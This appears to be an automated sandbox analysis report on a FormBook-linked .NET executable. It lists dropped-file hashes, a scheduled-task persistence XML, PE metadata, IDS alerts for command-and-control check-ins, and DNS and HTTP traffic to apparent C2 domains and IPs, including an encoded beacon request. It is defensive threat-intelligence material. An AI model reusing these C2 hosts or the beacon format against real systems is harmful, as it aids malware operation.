ONEANDONE-ASBrauerstrasse48DE | Shipment_Documents_Details-0l8x3.xlsx | malicious | 74.208.236.34
BEGET-ASRU | Pago bancario rpido.exe | malicious | 5.101.159.26
BEGET-ASRU | Bunker inquiry.exe | malicious | 5.101.159.26
BEGET-ASRU | DHL-AWB 9245125956.exe | malicious | 5.101.159.26
BEGET-ASRU | Indk#U00f8bsordre.exe | malicious | 5.101.159.26
BEGET-ASRU | DASDFASDSDSAD65468463153.vbs | malicious | 5.101.153.216
BEGET-ASRU | 00125514548754454542115454.vbs | malicious | 5.101.153.216
BEGET-ASRU | PAYMENT .doc | malicious | 5.101.159.26
BEGET-ASRU | Factura proforma # 65476_PDF.exe | malicious | 5.101.159.26
BEGET-ASRU | Appli Trading GmbH New Purchase Order.doc | malicious | 5.101.159.26
BEGET-ASRU | dzzkAYolMy.exe | malicious | 5.101.159.26
BEGET-ASRU | 1isequal9.arm | malicious | 81.200.119.14
BEGET-ASRU | 60rUtFJPFb.exe | malicious | 87.236.16.25
BEGET-ASRU | OQchDohurA.exe | malicious | 87.236.16.26
BEGET-ASRU | UW0Lx1YV5l.exe | malicious | 87.236.16.139
BEGET-ASRU | MIN56KgzBN.exe | malicious |
                                                        • 185.50.25.15
                                                        U7HCBc2SVy.exeGet hashmaliciousBrowse
                                                        • 185.50.25.15
                                                        TIoFSlDlv6.exeGet hashmaliciousBrowse
                                                        • 185.50.25.15
                                                        76xAf6BYg8.exeGet hashmaliciousBrowse
                                                        • 185.50.25.15
                                                        ErGfibAynh.exeGet hashmaliciousBrowse
                                                        • 185.50.25.15
                                                        Payment_invoice.exeGet hashmaliciousBrowse
                                                        • 87.236.16.223

                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Temp\tmp86AE.tmp
                                                        Process:C:\Users\user\Desktop\ejecutable2.exe
                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                        Category:modified
                                                        Size (bytes):1624
                                                        Entropy (8bit):5.154618648353861
                                                        Encrypted:false
                                                        SSDEEP:24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBGOtn:cbhZ7ClNQi/rydbz9I3YODOLNdq3P
                                                        MD5:226BF1ECCDE4C3DB411F9BE56F62BF5D
                                                        SHA1:361F86437AE2F25784D4B0C80E5D28FF1EE7965F
                                                        SHA-256:CC556D6C6369AC18884578C1B9CD1A7FF2E0CB2AA7FCD81D18332A1557643E81
                                                        SHA-512:9926464C42DEB23AC1F8DDFFD1FEE1ED57A3E93EF50DF51CD4B34518DE8D32EE67BFBAB7AEE8031414B1E212476AA9B511B4EAC1F463045D4893ED91A7BF8A16
                                                        Malicious:true
                                                        Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>
                                                        C:\Users\user\AppData\Roaming\CmsVPZkxbOtm.exe
                                                        Process:C:\Users\user\Desktop\ejecutable2.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):834048
                                                        Entropy (8bit):6.730510176351769
                                                        Encrypted:false
                                                        SSDEEP:12288:2ycxsoImFamoF83NIcTob0wOSHqQLfCtKbAG4fgmPywW4MaGhgv2totS7Ly319MC:7TcIFfzLr25+HFqM3sxR7WjYF+ja+i
                                                        MD5:2D359D2C999CCB15BC71229BB0275BB6
                                                        SHA1:5B5A384E8147FD996CA7C1C08F041F7B1FE7927A
                                                        SHA-256:5345F3E44AADB2D07FEB0520BCE71DD59BE35A53410FCFDA5C5C1BEC06B176BF
                                                        SHA-512:E318C5195D333D0A894D7838BDAB866FDF138E9FBDEF18E68612738B0771EAE0391AA8613F326ECC2ECF9782555E619D32BCA083331923EDE400316D08559018
                                                        Malicious:false
                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....NQa..............0.. ..........>?... ...@....@.. ....................................@..................................>..O....@..4............................................................................ ............... ..H............text...D.... ... .................. ..`.rsrc...4....@......."..............@..@.reloc..............................@..B................ ?......H...........|S..........d ................................................{#...*:.($.....}#...*..0..$........u......,.(%....{#....{#...o&...+..*v ..l. )UU.Z(%....{#...o'...X*...0..M........r...p......%..{#....................-.q.............-.&.+.......o(....()...*..{*...*..{+...*V.($.....}*.....}+...*..0..<........u......,0(%....{*....{*...o&...,.(,....{+....{+...o-...+..*. .pi| )UU.Z(%....{*...o'...X )UU.Z(,....{+...o....X*....0...........r%..p......%..{*...................
                                                        C:\Users\user\AppData\Roaming\CmsVPZkxbOtm.exe:Zone.Identifier
                                                        Process:C:\Users\user\Desktop\ejecutable2.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:false
                                                        Preview: [ZoneTransfer]....ZoneId=0

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Entropy (8bit):6.730510176351769
                                                        TrID:
                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                        • DOS Executable Generic (2002/1) 0.01%
                                                        File name:ejecutable2.exe
                                                        File size:834048
                                                        MD5:2d359d2c999ccb15bc71229bb0275bb6
                                                        SHA1:5b5a384e8147fd996ca7c1c08f041f7b1fe7927a
                                                        SHA256:5345f3e44aadb2d07feb0520bce71dd59be35a53410fcfda5c5c1bec06b176bf
                                                        SHA512:e318c5195d333d0a894d7838bdab866fdf138e9fbdef18e68612738b0771eae0391aa8613f326ecc2ecf9782555e619d32bca083331923ede400316d08559018
                                                        SSDEEP:12288:2ycxsoImFamoF83NIcTob0wOSHqQLfCtKbAG4fgmPywW4MaGhgv2totS7Ly319MC:7TcIFfzLr25+HFqM3sxR7WjYF+ja+i
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....NQa..............0.. ..........>?... ...@....@.. ....................................@................................

                                                        File Icon

                                                        Icon Hash:138e8eccece8cccc

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x4b3f3e
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                        Time Stamp:0x61514E89 [Mon Sep 27 04:54:33 2021 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:v4.0.30319
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                        Entrypoint Preview

                                                        Instruction
                                                        jmp dword ptr [00402000h]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al

                                                        Data Directories

                                                        Name                                  Virtual Address  Virtual Size  Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT          0xb3eec          0x4f          .text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE        0xb4000          0x19434       .rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC       0xce000          0xc           .reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                        Sections

                                                        Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
                                                        .text   0x2000           0xb1f44       0xb2000   False     0.666606774491   data       6.99221568577   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                        .rsrc   0xb4000          0x19434       0x19600   False     0.391712207512   data       4.29577228612   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc  0xce000          0xc           0x200     False     0.044921875      data       0.101910425663  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        Name           RVA      Size     Type                                                                                                          Language  Country
                                                        RT_ICON        0xb4180  0x10828  dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                                        RT_ICON        0xc49b8  0x4228   dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967295
                                                        RT_ICON        0xc8bf0  0x25a8   data
                                                        RT_ICON        0xcb1a8  0x10a8   data
                                                        RT_ICON        0xcc260  0x468    GLS_BINARY_LSB_FIRST
                                                        RT_GROUP_ICON  0xcc6d8  0x4c     data
                                                        RT_VERSION     0xcc734  0x33c    data
                                                        RT_MANIFEST    0xcca80  0x9b0    XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF, LF line terminators

                                                        Imports

                                                        DLL          Import
                                                        mscoree.dll  _CorExeMain

                                                        Version Infos

                                                        Description:Data
                                                        Translation:0x0000 0x04b0
                                                        LegalCopyright:Copyright F@Soft
                                                        Assembly Version:1.0.6.2
                                                        InternalName:UIntPtrTypeIn.exe
                                                        FileVersion:1.0.6.0
                                                        CompanyName:F@Soft
                                                        LegalTrademarks:
                                                        Comments:
                                                        ProductName:Darwin AW
                                                        ProductVersion:1.0.6.0
                                                        FileDescription:Darwin AW
                                                        OriginalFilename:UIntPtrTypeIn.exe

                                                        Network Behavior

                                                        Snort IDS Alerts

                                                        Timestamp                 Protocol  SID      Message                               Source Port  Dest Port  Source IP       Dest IP
                                                        09/27/21-17:39:07.055090  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49168        80         192.168.2.22    35.168.81.157
                                                        09/27/21-17:39:07.055090  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49168        80         192.168.2.22    35.168.81.157
                                                        09/27/21-17:39:07.055090  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49168        80         192.168.2.22    35.168.81.157
                                                        09/27/21-17:39:22.562083  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49171        80         192.168.2.22    34.102.136.180
                                                        09/27/21-17:39:22.562083  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49171        80         192.168.2.22    34.102.136.180
                                                        09/27/21-17:39:22.562083  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49171        80         192.168.2.22    34.102.136.180
                                                        09/27/21-17:39:22.675501  TCP       1201     ATTACK-RESPONSES 403 Forbidden        80           49171      34.102.136.180  192.168.2.22

                                                        Network Port Distribution

                                                        TCP Packets

                                                        Timestamp                             Source Port  Dest Port  Source IP       Dest IP
                                                        Sep 27, 2021 17:38:56.608946085 CEST  49167        80         192.168.2.22    3.223.115.185
                                                        Sep 27, 2021 17:38:56.710228920 CEST  80           49167      3.223.115.185   192.168.2.22
                                                        Sep 27, 2021 17:38:56.710319996 CEST  49167        80         192.168.2.22    3.223.115.185
                                                        Sep 27, 2021 17:38:56.713388920 CEST  49167        80         192.168.2.22    3.223.115.185
                                                        Sep 27, 2021 17:38:56.814147949 CEST  80           49167      3.223.115.185   192.168.2.22
                                                        Sep 27, 2021 17:38:56.814301968 CEST  49167        80         192.168.2.22    3.223.115.185
                                                        Sep 27, 2021 17:38:56.814359903 CEST  49167        80         192.168.2.22    3.223.115.185
                                                        Sep 27, 2021 17:38:56.914864063 CEST  80           49167      3.223.115.185   192.168.2.22
                                                        Sep 27, 2021 17:39:06.953140974 CEST  49168        80         192.168.2.22    35.168.81.157
                                                        Sep 27, 2021 17:39:07.054691076 CEST  80           49168      35.168.81.157   192.168.2.22
                                                        Sep 27, 2021 17:39:07.054817915 CEST  49168        80         192.168.2.22    35.168.81.157
                                                        Sep 27, 2021 17:39:07.055089951 CEST  49168        80         192.168.2.22    35.168.81.157
                                                        Sep 27, 2021 17:39:07.156269073 CEST  80           49168      35.168.81.157   192.168.2.22
                                                        Sep 27, 2021 17:39:07.158337116 CEST  80           49168      35.168.81.157   192.168.2.22
                                                        Sep 27, 2021 17:39:07.158396006 CEST  80           49168      35.168.81.157   192.168.2.22
                                                        Sep 27, 2021 17:39:07.158428907 CEST  80           49168      35.168.81.157   192.168.2.22
                                                        Sep 27, 2021 17:39:07.158556938 CEST  80           49168      35.168.81.157   192.168.2.22
                                                        Sep 27, 2021 17:39:07.158584118 CEST  80           49168      35.168.81.157   192.168.2.22
                                                        Sep 27, 2021 17:39:07.158623934 CEST  49168        80         192.168.2.22    35.168.81.157
                                                        Sep 27, 2021 17:39:07.158816099 CEST  49168        80         192.168.2.22    35.168.81.157
                                                        Sep 27, 2021 17:39:07.158935070 CEST  49168        80         192.168.2.22    35.168.81.157
                                                        Sep 27, 2021 17:39:07.259896994 CEST  80           49168      35.168.81.157   192.168.2.22
                                                        Sep 27, 2021 17:39:12.252114058 CEST  49169        80         192.168.2.22    195.77.116.8
                                                        Sep 27, 2021 17:39:12.313489914 CEST  80           49169      195.77.116.8    192.168.2.22
                                                        Sep 27, 2021 17:39:12.313558102 CEST  49169        80         192.168.2.22    195.77.116.8
                                                        Sep 27, 2021 17:39:12.313704967 CEST  49169        80         192.168.2.22    195.77.116.8
                                                        Sep 27, 2021 17:39:12.375854015 CEST  80           49169      195.77.116.8    192.168.2.22
                                                        Sep 27, 2021 17:39:12.386595964 CEST  80           49169      195.77.116.8    192.168.2.22
                                                        Sep 27, 2021 17:39:12.386697054 CEST  80           49169      195.77.116.8    192.168.2.22
                                                        Sep 27, 2021 17:39:12.386897087 CEST  49169        80         192.168.2.22    195.77.116.8
                                                        Sep 27, 2021 17:39:12.432111025 CEST  49169        80         192.168.2.22    195.77.116.8
                                                        Sep 27, 2021 17:39:12.493889093 CEST  80           49169      195.77.116.8    192.168.2.22
                                                        Sep 27, 2021 17:39:17.464262962 CEST  49170        80         192.168.2.22    217.160.0.222
                                                        Sep 27, 2021 17:39:17.483882904 CEST  80           49170      217.160.0.222   192.168.2.22
                                                        Sep 27, 2021 17:39:17.484036922 CEST  49170        80         192.168.2.22    217.160.0.222
                                                        Sep 27, 2021 17:39:17.484231949 CEST  49170        80         192.168.2.22    217.160.0.222
                                                        Sep 27, 2021 17:39:17.503827095 CEST  80           49170      217.160.0.222   192.168.2.22
                                                        Sep 27, 2021 17:39:17.509183884 CEST  80           49170      217.160.0.222   192.168.2.22
                                                        Sep 27, 2021 17:39:17.509215117 CEST  80           49170      217.160.0.222   192.168.2.22
                                                        Sep 27, 2021 17:39:17.509506941 CEST  49170        80         192.168.2.22    217.160.0.222
                                                        Sep 27, 2021 17:39:17.509589911 CEST  49170        80         192.168.2.22    217.160.0.222
                                                        Sep 27, 2021 17:39:17.531337023 CEST  80           49170      217.160.0.222   192.168.2.22
                                                        Sep 27, 2021 17:39:22.549463987 CEST  49171        80         192.168.2.22    34.102.136.180
                                                        Sep 27, 2021 17:39:22.561580896 CEST  80           49171      34.102.136.180  192.168.2.22
                                                        Sep 27, 2021 17:39:22.561748981 CEST  49171        80         192.168.2.22    34.102.136.180
                                                        Sep 27, 2021 17:39:22.562083006 CEST  49171        80         192.168.2.22    34.102.136.180
                                                        Sep 27, 2021 17:39:22.573887110 CEST  80           49171      34.102.136.180  192.168.2.22
                                                        Sep 27, 2021 17:39:22.675501108 CEST  80           49171      34.102.136.180  192.168.2.22
                                                        Sep 27, 2021 17:39:22.675894022 CEST  80           49171      34.102.136.180  192.168.2.22
                                                        Sep 27, 2021 17:39:22.675930977 CEST  49171        80         192.168.2.22    34.102.136.180
                                                        Sep 27, 2021 17:39:22.675959110 CEST4917180192.168.2.2234.102.136.180
                                                        Sep 27, 2021 17:39:22.688532114 CEST804917134.102.136.180192.168.2.22
                                                        Sep 27, 2021 17:39:27.756493092 CEST4917280192.168.2.2281.169.145.77
                                                        Sep 27, 2021 17:39:27.778821945 CEST804917281.169.145.77192.168.2.22
                                                        Sep 27, 2021 17:39:27.778943062 CEST4917280192.168.2.2281.169.145.77
                                                        Sep 27, 2021 17:39:27.779182911 CEST4917280192.168.2.2281.169.145.77
                                                        Sep 27, 2021 17:39:27.801886082 CEST804917281.169.145.77192.168.2.22
                                                        Sep 27, 2021 17:39:27.804255962 CEST804917281.169.145.77192.168.2.22
                                                        Sep 27, 2021 17:39:27.804285049 CEST804917281.169.145.77192.168.2.22
                                                        Sep 27, 2021 17:39:27.804548025 CEST4917280192.168.2.2281.169.145.77
                                                        Sep 27, 2021 17:39:27.804605961 CEST4917280192.168.2.2281.169.145.77
                                                        Sep 27, 2021 17:39:27.826710939 CEST804917281.169.145.77192.168.2.22
                                                        Sep 27, 2021 17:39:32.899960041 CEST4917380192.168.2.225.101.152.161
                                                        Sep 27, 2021 17:39:32.946930885 CEST80491735.101.152.161192.168.2.22
                                                        Sep 27, 2021 17:39:32.947105885 CEST4917380192.168.2.225.101.152.161
                                                        Sep 27, 2021 17:39:32.950460911 CEST4917380192.168.2.225.101.152.161
                                                        Sep 27, 2021 17:39:32.997994900 CEST80491735.101.152.161192.168.2.22
                                                        Sep 27, 2021 17:39:33.020418882 CEST80491735.101.152.161192.168.2.22
                                                        Sep 27, 2021 17:39:33.023408890 CEST4917380192.168.2.225.101.152.161
                                                        Sep 27, 2021 17:39:33.024389982 CEST80491735.101.152.161192.168.2.22
                                                        Sep 27, 2021 17:39:33.027858973 CEST4917380192.168.2.225.101.152.161
                                                        Sep 27, 2021 17:39:33.070858955 CEST80491735.101.152.161192.168.2.22

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 27, 2021 17:38:56.473535061 CEST | 52167 | 53 | 192.168.2.22 | 8.8.8.8
Sep 27, 2021 17:38:56.594779968 CEST | 53 | 52167 | 8.8.8.8 | 192.168.2.22
Sep 27, 2021 17:39:06.823992968 CEST | 50591 | 53 | 192.168.2.22 | 8.8.8.8
Sep 27, 2021 17:39:06.951486111 CEST | 53 | 50591 | 8.8.8.8 | 192.168.2.22
Sep 27, 2021 17:39:12.190723896 CEST | 57805 | 53 | 192.168.2.22 | 8.8.8.8
Sep 27, 2021 17:39:12.248907089 CEST | 53 | 57805 | 8.8.8.8 | 192.168.2.22
Sep 27, 2021 17:39:17.432555914 CEST | 59030 | 53 | 192.168.2.22 | 8.8.8.8
Sep 27, 2021 17:39:17.463222027 CEST | 53 | 59030 | 8.8.8.8 | 192.168.2.22
Sep 27, 2021 17:39:22.518026114 CEST | 59185 | 53 | 192.168.2.22 | 8.8.8.8
Sep 27, 2021 17:39:22.548149109 CEST | 53 | 59185 | 8.8.8.8 | 192.168.2.22
Sep 27, 2021 17:39:27.712830067 CEST | 55616 | 53 | 192.168.2.22 | 8.8.8.8
Sep 27, 2021 17:39:27.755270004 CEST | 53 | 55616 | 8.8.8.8 | 192.168.2.22
Sep 27, 2021 17:39:32.814937115 CEST | 49972 | 53 | 192.168.2.22 | 8.8.8.8
Sep 27, 2021 17:39:32.898519993 CEST | 53 | 49972 | 8.8.8.8 | 192.168.2.22

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Sep 27, 2021 17:38:56.473535061 CEST | 192.168.2.22 | 8.8.8.8 | 0x8eb8 | Standard query (0) | www.tunetel.com | A (IP address) | IN (0x0001)
Sep 27, 2021 17:39:06.823992968 CEST | 192.168.2.22 | 8.8.8.8 | 0xc18c | Standard query (0) | www.branchwallet.com | A (IP address) | IN (0x0001)
Sep 27, 2021 17:39:12.190723896 CEST | 192.168.2.22 | 8.8.8.8 | 0xfc43 | Standard query (0) | www.iptechcm.com | A (IP address) | IN (0x0001)
Sep 27, 2021 17:39:17.432555914 CEST | 192.168.2.22 | 8.8.8.8 | 0x9c63 | Standard query (0) | www.pizza-mio.com | A (IP address) | IN (0x0001)
Sep 27, 2021 17:39:22.518026114 CEST | 192.168.2.22 | 8.8.8.8 | 0x30e0 | Standard query (0) | www.wwiilive.com | A (IP address) | IN (0x0001)
Sep 27, 2021 17:39:27.712830067 CEST | 192.168.2.22 | 8.8.8.8 | 0x9037 | Standard query (0) | www.play-to-escape.com | A (IP address) | IN (0x0001)
Sep 27, 2021 17:39:32.814937115 CEST | 192.168.2.22 | 8.8.8.8 | 0xce43 | Standard query (0) | www.yhomggsmtdynchb.store | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Sep 27, 2021 17:38:56.594779968 CEST | 8.8.8.8 | 192.168.2.22 | 0x8eb8 | No error (0) | www.tunetel.com | HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | - | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 17:38:56.594779968 CEST | 8.8.8.8 | 192.168.2.22 | 0x8eb8 | No error (0) | HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | - | 3.223.115.185 | A (IP address) | IN (0x0001)
Sep 27, 2021 17:39:06.951486111 CEST | 8.8.8.8 | 192.168.2.22 | 0xc18c | No error (0) | www.branchwallet.com | comingsoon.namebright.com | - | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 17:39:06.951486111 CEST | 8.8.8.8 | 192.168.2.22 | 0xc18c | No error (0) | comingsoon.namebright.com | cdl-lb-1356093980.us-east-1.elb.amazonaws.com | - | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 17:39:06.951486111 CEST | 8.8.8.8 | 192.168.2.22 | 0xc18c | No error (0) | cdl-lb-1356093980.us-east-1.elb.amazonaws.com | - | 35.168.81.157 | A (IP address) | IN (0x0001)
Sep 27, 2021 17:39:06.951486111 CEST | 8.8.8.8 | 192.168.2.22 | 0xc18c | No error (0) | cdl-lb-1356093980.us-east-1.elb.amazonaws.com | - | 54.85.93.188 | A (IP address) | IN (0x0001)
Sep 27, 2021 17:39:12.248907089 CEST | 8.8.8.8 | 192.168.2.22 | 0xfc43 | No error (0) | www.iptechcm.com | - | 195.77.116.8 | A (IP address) | IN (0x0001)
Sep 27, 2021 17:39:17.463222027 CEST | 8.8.8.8 | 192.168.2.22 | 0x9c63 | No error (0) | www.pizza-mio.com | - | 217.160.0.222 | A (IP address) | IN (0x0001)
Sep 27, 2021 17:39:22.548149109 CEST | 8.8.8.8 | 192.168.2.22 | 0x30e0 | No error (0) | www.wwiilive.com | wwiilive.com | - | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 17:39:22.548149109 CEST | 8.8.8.8 | 192.168.2.22 | 0x30e0 | No error (0) | wwiilive.com | - | 34.102.136.180 | A (IP address) | IN (0x0001)
Sep 27, 2021 17:39:27.755270004 CEST | 8.8.8.8 | 192.168.2.22 | 0x9037 | No error (0) | www.play-to-escape.com | play-to-escape.com | - | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 17:39:27.755270004 CEST | 8.8.8.8 | 192.168.2.22 | 0x9037 | No error (0) | play-to-escape.com | - | 81.169.145.77 | A (IP address) | IN (0x0001)
Sep 27, 2021 17:39:32.898519993 CEST | 8.8.8.8 | 192.168.2.22 | 0xce43 | No error (0) | www.yhomggsmtdynchb.store | - | 5.101.152.161 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• www.tunetel.com
• www.branchwallet.com
• www.iptechcm.com
• www.pizza-mio.com
• www.wwiilive.com
• www.play-to-escape.com
• www.yhomggsmtdynchb.store

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49167 | 3.223.115.185 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 17:38:56.713388920 CEST | 0 | OUT | GET /u4an/?cRrtMz2=FQD7DOPg41An23BytYAyzDzwyZJ0tQikl+psJg3VSFai3GWkns53TVvYc7bwkTS4QXibfw==&an=lnlpiVNpa2ntv HTTP/1.1
Host: www.tunetel.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Sep 27, 2021 17:38:56.814147949 CEST | 1 | IN | HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: https://www.hugedomains.com/domain_profile.cfm?d=tunetel&e=com
